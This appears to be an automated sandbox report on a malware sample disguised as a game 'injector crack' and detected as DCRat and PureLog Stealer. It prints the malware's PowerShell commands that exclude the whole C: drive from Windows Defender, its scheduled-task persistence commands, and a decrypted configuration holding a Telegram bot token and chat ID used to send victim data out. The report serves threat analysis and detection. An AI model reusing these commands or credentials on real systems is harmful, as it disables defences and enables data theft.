Edit tour

Windows Analysis Report
ElixirInjector.exe

Overview

General Information

Sample name:	ElixirInjector.exe
Analysis ID:	1590004
MD5:	04095b54d4245dca4aeb05310a2ddc8a
SHA1:	4d5bc54fade2e8af35d36ae0cab2c0f835cb7334
SHA256:	7014e9a725d8449f588d906d671771ccbf2c253d603205818a5af782a02e320c
Tags:	DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Creates processes via WMI

Drops executables to the windows directory (C:\Windows) and starts them

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

ElixirInjector.exe (PID: 2248 cmdline: "C:\Users\user\Desktop\ElixirInjector.exe" MD5: 04095B54D4245DCA4AEB05310A2DDC8A)

wscript.exe (PID: 6688 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 6192 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\6iq5IFzZA9EyHTwKHM8vXk9USXtHecApoG.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Bluestacks.exe (PID: 3576 cmdline: "C:\Users\user\AppData\Local\Temp\WinRAR/data/bin/unistall/Bluestacks.exe" MD5: E18151C31580AA91CEB01099DE4277B2)

schtasks.exe (PID: 3004 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6488 cmdline: schtasks.exe /create /tn "fvXBwqYdGYPkplbuTcoXecCdPf" /sc MINUTE /mo 9 /tr "'C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1016 cmdline: schtasks.exe /create /tn "fvXBwqYdGYPkplbuTcoXecCdPf" /sc MINUTE /mo 7 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

powershell.exe (PID: 640 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6408 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8904 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 6980 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5916 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2872 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3320 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2744 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5748 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5712 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5228 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1460 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4876 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3004 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellComponents\cmd.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6524 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6488 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5552 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2852 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1016 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7820 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9w1FkSj5b9.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 8456 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 8588 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

fvXBwqYdGYPkplbuTcoXecCdP.exe (PID: 8996 cmdline: "C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe" MD5: E18151C31580AA91CEB01099DE4277B2)

Bluestacks.exe (PID: 5648 cmdline: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe MD5: E18151C31580AA91CEB01099DE4277B2)

Bluestacks.exe (PID: 6188 cmdline: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe MD5: E18151C31580AA91CEB01099DE4277B2)

cmd.exe (PID: 3420 cmdline: C:\Windows\ShellComponents\cmd.exe MD5: E18151C31580AA91CEB01099DE4277B2)

cmd.exe (PID: 6808 cmdline: C:\Windows\ShellComponents\cmd.exe MD5: E18151C31580AA91CEB01099DE4277B2)

fontdrvhost.exe (PID: 6852 cmdline: "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe" MD5: E18151C31580AA91CEB01099DE4277B2)

fontdrvhost.exe (PID: 7436 cmdline: "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe" MD5: E18151C31580AA91CEB01099DE4277B2)

fvXBwqYdGYPkplbuTcoXecCdP.exe (PID: 3424 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe MD5: E18151C31580AA91CEB01099DE4277B2)

fvXBwqYdGYPkplbuTcoXecCdP.exe (PID: 8440 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe MD5: E18151C31580AA91CEB01099DE4277B2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2669535434.0000000012933000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000000.2216100697.0000000000162000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: Bluestacks.exe PID: 3576	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: fvXBwqYdGYPkplbuTcoXecCdP.exe PID: 8996	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
5.0.Bluestacks.exe.160000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.0.Bluestacks.exe.160000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe, ProcessId: 3576, TargetFilename: C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\WinRAR/data/bin/unistall/Bluestacks.exe", ParentImage: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe, ParentProcessId: 3576, ParentProcessName: Bluestacks.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 640, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ElixirInjector.exe", ParentImage: C:\Users\user\Desktop\ElixirInjector.exe, ParentProcessId: 2248, ParentProcessName: ElixirInjector.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe" , ProcessId: 6688, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ElixirInjector.exe", ParentImage: C:\Users\user\Desktop\ElixirInjector.exe, ParentProcessId: 2248, ParentProcessName: ElixirInjector.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe" , ProcessId: 6688, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ElixirInjector.exe", ParentImage: C:\Users\user\Desktop\ElixirInjector.exe, ParentProcessId: 2248, ParentProcessName: ElixirInjector.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe" , ProcessId: 6688, ProcessName: wscript.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe'" /f, CommandLine: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\WinRAR/data/bin/unistall/Bluestacks.exe", ParentImage: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe, ParentProcessId: 3576, ParentProcessName: Bluestacks.exe, ProcessCommandLine: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe'" /f, ProcessId: 3004, ProcessName: schtasks.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ElixirInjector.exe", ParentImage: C:\Users\user\Desktop\ElixirInjector.exe, ParentProcessId: 2248, ParentProcessName: ElixirInjector.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe" , ProcessId: 6688, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\WinRAR/data/bin/unistall/Bluestacks.exe", ParentImage: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe, ParentProcessId: 3576, ParentProcessName: Bluestacks.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 640, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T13:20:31.267087+0100	2803305	3	Unknown Traffic	192.168.2.6	49847	34.117.59.81	443	TCP

Joe Security ANOMALY Telegram Send Photo

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T13:20:32.313688+0100	1810009	1	Potentially Bad Traffic	192.168.2.6	49852	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe	Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Avira: detection malicious, Label: HEUR/AGEN.1339906

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	ReversingLabs: Detection: 58%
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Virustotal: Detection: 59%	Perma Link
Source: C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe	Virustotal: Detection: 59%	Perma Link
Source: C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Virustotal: Detection: 59%	Perma Link
Source: C:\Users\user\Desktop\DvqGSnXS.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\EbKwZRsK.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\uAazTYNi.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\wxCHpYcd.log	ReversingLabs: Detection: 50%
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	ReversingLabs: Detection: 58%
Source: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	ReversingLabs: Detection: 58%
Source: C:\Windows\ShellComponents\cmd.exe (copy)	ReversingLabs: Detection: 58%

Multi AV Scanner detection for submitted file

Source: ElixirInjector.exe	ReversingLabs: Detection: 60%
Source: ElixirInjector.exe	Virustotal: Detection: 65%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000005.00000002.2669535434.0000000012933000.00000004.00000800.00020000.00000000.sdmp	String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"75400db8-4680-4af7-97bd-c8a76b65b9c4":{"_0":"cjsQfRMzEpfjsKDGkaTtaHGCWdVBASBP","_1":"Elixir Injector Crack","_2":"telegram: @ReanSoft","_3":"None","_4":"OK"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive"},"TelegramNotifer":{"chatid":"6275749393","bottoken":"7622199935:AAFHSUQ61526mhYJcmipjqz2DM9Zso04aBI","settings":"hello\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"False","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"}}
Source: 00000005.00000002.2669535434.0000000012933000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-B8rfKRhj2yUsgHgmOHtf","0","elixirrrrrrrrr","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]

